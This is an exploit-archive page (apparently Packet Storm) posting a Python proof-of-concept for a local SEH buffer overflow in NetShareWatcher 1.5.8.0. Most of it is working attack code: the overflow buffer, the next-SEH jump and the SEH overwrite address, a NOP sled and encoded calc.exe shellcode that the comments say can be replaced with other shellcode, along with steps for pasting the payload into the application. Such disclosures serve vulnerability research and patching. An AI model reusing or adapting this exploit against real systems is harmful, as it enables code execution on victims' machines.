exploit the possibilities

NetShareWatcher 1.5.8.0 Local SEH Buffer Overflow

NetShareWatcher 1.5.8.0 Local SEH Buffer Overflow
Posted Mar 20, 2019
Authored by Peyman Forouzan

NetShareWatcher version 1.5.8.0 local SEH buffer overflow exploit.

tags | exploit, overflow, local
MD5 | acb6361619fcc1bf9696eea686578de6

NetShareWatcher 1.5.8.0 Local SEH Buffer Overflow

Change Mirror Download
# Exploit Title: NetShareWatcher 1.5.8.0 - SEH Buffer Overflow
# Date: 2019-03-19
# Vendor Homepage: http://netsharewatcher.nsauditor.com
# Software Link: http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
# Exploit Author: Peyman Forouzan
# Tested Version: 1.5.8.0
# Tested on: Windows XP SP2 - SP3

# 1- Run python code : NetShareWatcher.py
# 2- Open Exploit.txt and copy content to clipboard
# 3- Open NetShareWatcher
# 4- Setting --> Defaults --> Restrictions --> Add --> Custome
# 5- Paste the content of Exploit.txt into the box
# 6- Click 'Find'
# 7- Calc.exe Open ( Can be replaced with Shellcode )

#!/usr/bin/python

buffer = "\x41" * 262
nseh = "\xeb\x14\x90\x90" # Overwrite Next Seh With Short jmp
seh = "\x90\xBF\xC9\x74" # Overwrite Seh / pop esi pop ebx retn [OLEACC.dll]
nops = "\x90" * 20

# Calc.exe payload [size 227]
buf =""
buf += "\xdb\xcf\xb8\x27\x17\x16\x1f\xd9\x74\x24\xf4\x5f\x2b\xc9"
buf += "\xb1\x33\x31\x47\x17\x83\xef\xfc\x03\x60\x04\xf4\xea\x92"
buf += "\xc2\x71\x14\x6a\x13\xe2\x9c\x8f\x22\x30\xfa\xc4\x17\x84"
buf += "\x88\x88\x9b\x6f\xdc\x38\x2f\x1d\xc9\x4f\x98\xa8\x2f\x7e"
buf += "\x19\x1d\xf0\x2c\xd9\x3f\x8c\x2e\x0e\xe0\xad\xe1\x43\xe1"
buf += "\xea\x1f\xab\xb3\xa3\x54\x1e\x24\xc7\x28\xa3\x45\x07\x27"
buf += "\x9b\x3d\x22\xf7\x68\xf4\x2d\x27\xc0\x83\x66\xdf\x6a\xcb"
buf += "\x56\xde\xbf\x0f\xaa\xa9\xb4\xe4\x58\x28\x1d\x35\xa0\x1b"
buf += "\x61\x9a\x9f\x94\x6c\xe2\xd8\x12\x8f\x91\x12\x61\x32\xa2"
buf += "\xe0\x18\xe8\x27\xf5\xba\x7b\x9f\xdd\x3b\xaf\x46\x95\x37"
buf += "\x04\x0c\xf1\x5b\x9b\xc1\x89\x67\x10\xe4\x5d\xee\x62\xc3"
buf += "\x79\xab\x31\x6a\xdb\x11\x97\x93\x3b\xfd\x48\x36\x37\xef"
buf += "\x9d\x40\x1a\x65\x63\xc0\x20\xc0\x63\xda\x2a\x62\x0c\xeb"
buf += "\xa1\xed\x4b\xf4\x63\x4a\xa3\xbe\x2e\xfa\x2c\x67\xbb\xbf"
buf += "\x30\x98\x11\x83\x4c\x1b\x90\x7b\xab\x03\xd1\x7e\xf7\x83"
buf += "\x09\xf2\x68\x66\x2e\xa1\x89\xa3\x4d\x24\x1a\x2f\xbc\xc3"
buf += "\x9a\xca\xc0";

payload = buffer + nseh + seh + nops + buf
try:
f=open("Exploit.txt","w")
print "[+] Creating %s bytes payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File can't be created"

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close